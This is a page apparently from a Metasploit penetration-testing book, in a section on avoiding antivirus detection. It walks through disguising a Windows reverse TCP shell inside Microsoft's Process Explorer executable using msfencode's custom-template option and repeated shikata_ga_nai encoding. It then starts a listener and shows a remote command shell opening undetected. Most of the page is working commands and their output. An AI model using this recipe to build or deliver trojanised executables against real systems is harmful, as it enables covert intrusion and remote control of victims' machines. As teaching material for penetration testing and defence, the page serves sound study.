background image

Avoiding Detection

105

Custom Executable Templates

Typically, when 

msfencode

 is run, the payload is embedded into the default 

executable template at 

data/templates/template.exe

. Although this template is 

changed on occasion, antivirus vendors still look for it when building signa-
tures. However, 

msfencode

 now supports the use of any Windows executable 

in place of the default executable template via the 

-x

 option. In the follow-

ing example, we encode our payload again using the Process Explorer from 
Microsoft’s Sysinternals Suite as a custom-executable template.

root@bt:/opt/framework3/msf3# 

wget  http://download.sysinternals.com/Files/

ProcessExplorer.zip

 

. . . SNIP . . .

2011-03-21 17:14:46 (119 KB/s) - 'ProcessExplorer.zip' saved [1615732/1615732]

root@bt:/opt/framework3/msf3# 

cd work/

root@bt:/opt/framework3/msf3/work# 

unzip ../ProcessExplorer.zip 

Archive:  ../ProcessExplorer.zip
  inflating: procexp.chm             
  inflating: procexp.exe             
  inflating: Eula.txt                
root@bt:/opt/framework3/msf3/work# 

cd ..

root@bt:/opt/framework3/msf3# 

msfpayload windows/shell_reverse_tcp 

LHOST=192.168.1.101 LPORT=8080 R | msfencode -t exe -x work/procexp.exe   
-o /var/www/pe_backdoor.exe -e x86/shikata_ga_nai -c 5

[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=5)

As you can see, at   we download Process Explorer from Microsoft 

then unzip it at  . Then at   we use the 

-x

 switch to specify the downloaded 

Process Explorer binary for use as our custom template. After encoding com-
pletes, we start up the multi-handler through 

msfcli

 to listen for the incoming 

connection, as shown here:

root@bt:/opt/framework3/msf3# 

msfcli exploit/multi/handler PAYLOAD=windows/

shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 E

[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.101:8080 
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.101:8080 -> 192.168.1.195:1191)

C:\Documents and Settings\Administrator\My Documents\Downloads>

And voilĂ : We have successfully opened a shell without being detected by 

antivirus software.